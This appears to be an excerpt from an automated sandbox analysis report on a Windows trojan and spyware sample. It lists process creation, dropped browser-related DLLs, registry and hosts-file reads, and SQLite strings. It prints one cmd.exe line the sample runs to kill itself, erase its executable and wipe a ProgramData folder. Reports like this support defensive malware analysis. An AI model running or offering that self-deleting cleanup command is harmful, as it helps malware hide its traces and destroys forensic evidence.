                      Source: buIKlB688e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 0_2_00A343510_2_00A34351
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 0_2_0120C1240_2_0120C124
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 0_2_0120E5600_2_0120E560
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 0_2_0120E5700_2_0120E570
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 4_2_003143514_2_00314351
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_004134805_2_00413480
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_00413C905_2_00413C90
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_004130605_2_00413060
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_00413AA05_2_00413AA0
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_00404B105_2_00404B10
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_005F43515_2_005F4351
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: String function: 00408C20 appears 41 times
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: String function: 00422F70 appears 391 times
                      Source: buIKlB688e.exeBinary or memory string: OriginalFilename vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000000.00000002.370724291.0000000001280000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000000.00000002.378147940.0000000007410000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs buIKlB688e.exe
                      Source: buIKlB688e.exeBinary or memory string: OriginalFilename vs buIKlB688e.exe
                      Source: buIKlB688e.exeBinary or memory string: OriginalFilename vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000005.00000003.378804313.000000000345B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs buIKlB688e.exe
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs buIKlB688e.exe
                      Source: buIKlB688e.exeBinary or memory string: OriginalFilenameApartmentSta.exe4 vs buIKlB688e.exe
                      Source: sqlite3.dll.5.drStatic PE information: Number of sections : 19 > 10
                      Source: buIKlB688e.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: buIKlB688e.exeReversingLabs: Detection: 26%
                      Source: buIKlB688e.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\buIKlB688e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\buIKlB688e.exe 'C:\Users\user\Desktop\buIKlB688e.exe'
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exeJump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exeJump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364 Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 5364)
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\buIKlB688e.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/13@1/1
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.iniJump to behavior
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                      Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: C:\Users\user\Desktop\buIKlB688e.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: buIKlB688e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: buIKlB688e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
                      Source: Binary string: vcruntime140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
                      Source: Binary string: msvcp140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr

                      Data Obfuscation: